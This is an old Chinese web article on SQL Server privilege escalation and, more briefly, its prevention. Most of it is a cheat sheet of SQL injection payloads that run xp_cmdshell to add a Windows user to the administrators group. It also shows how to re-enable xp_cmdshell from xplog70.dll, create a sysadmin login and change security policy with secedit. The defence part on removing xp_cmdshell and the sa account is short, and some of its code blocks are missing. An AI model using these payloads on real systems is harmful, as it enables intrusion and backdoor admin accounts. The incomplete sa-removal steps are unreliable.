SQL Server 提升权限相关命令及防范

日期：2005-7-5 11:13:48    作者：佚名   人气：   来源：未知

---

SQL Server 提升权限相关命令及防范
;exec master..xp_cmdshell "net user name password /add"--
;exec master..xp_cmdshell "net localgroup administrators name /add"--

程序代码开启cmdshell的SQL语句

EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK

恢复xp_cmdshell
Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK

否则上传xplog7.0.dll
Exec master.dbo.addextendedproc 'xp_cmdshell','C:/WinNt/System32/xplog70.dll'

堵上cmdshell的SQL语句
sp_dropextendedproc "xp_cmdshell"


DOS:
dir c:/
dir d:/
dir e:/

net user TsInternetUsers Password /add
net localGroup Administrators TsInternetUsers /add

备份恢复IPSEC

secedit /export /CFG c:/tmp.inf
echo sedenynetworklogonright =>>c:/tmp.inf
secedit /configure /db c:/windows/secedit.sdb /CFG c:/tmp.inf

SQL:
exec master..sp_addlogin UserName,Password
exec master..sp_addsrvrolemember UserName,sysadmin


sa帐号的改名和删除
首先打开SQL中的企业管理器，接着在工具选项卡中选择SQL server配置属性依次，点服务器设置，看到允许对系统目录直接进行修改前面的方框吗，点一下，好。
再打开查询分析器，登陆进去（呵呵，随便你用什么帐号进去，不过可一定要在master数据库中有db_owner的权限）输入

,OK，执行成功，好拉，转道企业管理器中刷新安全性中的登陆，看看，sa是不是变成xwq拉，呵呵，选中xwq点击右键，怎么样是不是出现拉删除的选项，呵呵，删除。看看sa是不是已经没有拉。


后记

直接在查询分析器里怎么删除sa

直接在查询分析器里怎么删除sa，做法和前面所说的差不多，只不过这次不是在企业管理器中做手脚拉，而是利用sql提供给我们功能强大的存储过程来完成这项任务。下面就是我所说的需要利用的存储过程sp_configure，sp_configure显示或更改当前服务器的全局配置设置。
它的语法:

程序代码：

]

实例：


好拉，这样我们就可以更新系统表拉，接下来和前面的做法一样拉 update sysxlogins set name='你要改成的名字' where sid=0x01，然后再删除"你改名后的那个名字"
不过要注意在 sp_configure 上没有参数（或只有第一个参数）的执行许可权限默认授予所有用户。有两个参数的 sp_configure（用于更改配置选项）的执行许可权限默认授予 sysadmin 和 serveradmin 固定服务器角色。RECONFIGURE 权限默认授予 sysadmin 固定服务器角色和 serveradmin 固定服务器角色，并且不能传输。还得在master中是db_owner。
www.CLDE.net